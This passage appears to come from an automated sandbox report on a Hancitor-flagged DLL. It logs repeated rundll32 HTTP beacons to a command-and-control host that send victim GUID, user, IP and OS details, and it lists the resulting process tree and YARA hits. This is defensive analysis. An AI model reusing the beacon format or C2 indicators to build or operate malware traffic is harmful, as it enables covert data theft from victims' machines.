                              Data Ascii: cCFUXARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              94192.168.2.34982177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:12:01.600835085 CEST5494OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:12:01.669900894 CEST5495INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:03 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 54 5a 41 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cTZAGARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              95192.168.2.34982377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:12:01.817991972 CEST5496OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:12:01.886123896 CEST5496INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:03 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 46 51 4a 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cFQJUARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              96192.168.2.34982277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:12:01.818382978 CEST5496OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:12:01.886146069 CEST5497INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:03 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 56 54 47 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cVTGEARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              97192.168.2.34982477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:12:01.998018980 CEST5498OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:12:02.066504955 CEST5498INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:03 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 47 48 53 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cGHSTARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              98192.168.2.34982577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:12:02.194227934 CEST5499OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:12:02.261106014 CEST5500INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:03 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 59 51 4a 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cYQJBARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              99192.168.2.34982677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:12:02.203263998 CEST5500OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:12:02.269040108 CEST5500INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:03 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 56 41 5a 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cVAZEARRABw==0


                              Code Manipulations

                              Statistics

                              Behavior

                              Click to jump to process

                              System Behavior

                              Analysis Process: loaddll32.exe PID: 580 Parent PID: 5820

                              General

                              Start time:03:10:01
                              Start date:09/07/2021
                              Path:C:\Windows\System32\loaddll32.exe
                              Wow64 process (32bit):true
                              Commandline:loaddll32.exe 'C:\Users\user\Desktop\niberius.dll'
                              Imagebase:0x1200000
                              File size:116736 bytes
                              MD5 hash:542795ADF7CC08EFCF675D65310596E8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000000.00000003.371171215.0000000001500000.00000040.00000001.sdmp, Author: Joe Security
                              Reputation:high

                              Analysis Process: cmd.exe PID: 476 Parent PID: 580

                              General

                              Start time:03:10:01
                              Start date:09/07/2021
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\niberius.dll',#1
                              Imagebase:0xbd0000
                              File size:232960 bytes
                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Analysis Process: rundll32.exe PID: 4156 Parent PID: 580

                              General

                              Start time:03:10:01
                              Start date:09/07/2021
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe C:\Users\user\Desktop\niberius.dll,Exercisefound
                              Imagebase:0xe30000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000002.00000003.339351013.0000000000660000.00000040.00000001.sdmp, Author: Joe Security
                              Reputation:high

                              Analysis Process: rundll32.exe PID: 2988 Parent PID: 476

                              General

                              Start time:03:10:02
                              Start date:09/07/2021
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe 'C:\Users\user\Desktop\niberius.dll',#1
                              Imagebase:0xe30000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000003.00000003.338747871.0000000000D10000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000003.00000002.488244690.0000000002E54000.00000002.00020000.sdmp, Author: Joe Security
                              Reputation:high

                              Analysis Process: rundll32.exe PID: 4692 Parent PID: 580

                              General

                              Start time:03:10:06
                              Start date:09/07/2021
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe C:\Users\user\Desktop\niberius.dll,Forwardlow
                              Imagebase:0xe30000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000004.00000003.355295800.0000000000630000.00000040.00000001.sdmp, Author: Joe Security
                              Reputation:high

                              Analysis Process: rundll32.exe PID: 2492 Parent PID: 580

                              General

                              Start time:03:10:10
                              Start date:09/07/2021
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe C:\Users\user\Desktop\niberius.dll,More
                              Imagebase:0xe30000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000005.00000003.363092172.00000000004F0000.00000040.00000001.sdmp, Author: Joe Security
                              Reputation:high

                              Analysis Process: rundll32.exe PID: 4708 Parent PID: 580

                              General

                              Start time:03:10:15
                              Start date:09/07/2021
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe C:\Users\user\Desktop\niberius.dll,Overhuge
                              Imagebase:0xe30000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000006.00000003.368759303.0000000004F40000.00000040.00000001.sdmp, Author: Joe Security
                              Reputation:high

                              Analysis Process: svchost.exe PID: 5480 Parent PID: 2988

                              General

                              Start time:03:11:14
                              Start date:09/07/2021
                              Path:C:\Windows\SysWOW64\svchost.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\System32\svchost.exe
                              Imagebase:0x990000
                              File size:44520 bytes
                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Analysis Process: rundll32.exe PID: 5972 Parent PID: 580

                              General

                              Start time:03:11:17
                              Start date:09/07/2021
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe 'C:\Users\user\Desktop\niberius.dll',ONOQWPYIEIR
                              Imagebase:0xe30000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 0000000E.00000002.488456292.0000000004434000.00000002.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 0000000E.00000003.441877348.0000000000DD0000.00000040.00000001.sdmp, Author: Joe Security
                              Reputation:high

                              Analysis Process: rundll32.exe PID: 3704 Parent PID: 580

                              General

                              Start time:03:11:18
                              Start date:09/07/2021
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe 'C:\Users\user\Desktop\niberius.dll',VKHFWVNHPFTVX
                              Imagebase:0xe30000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 0000000F.00000002.488676401.0000000004BA4000.00000002.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 0000000F.00000003.443699128.0000000004CA0000.00000040.00000001.sdmp, Author: Joe Security
                              Reputation:high

                              Disassembly

                              Code Analysis

                              Reset < >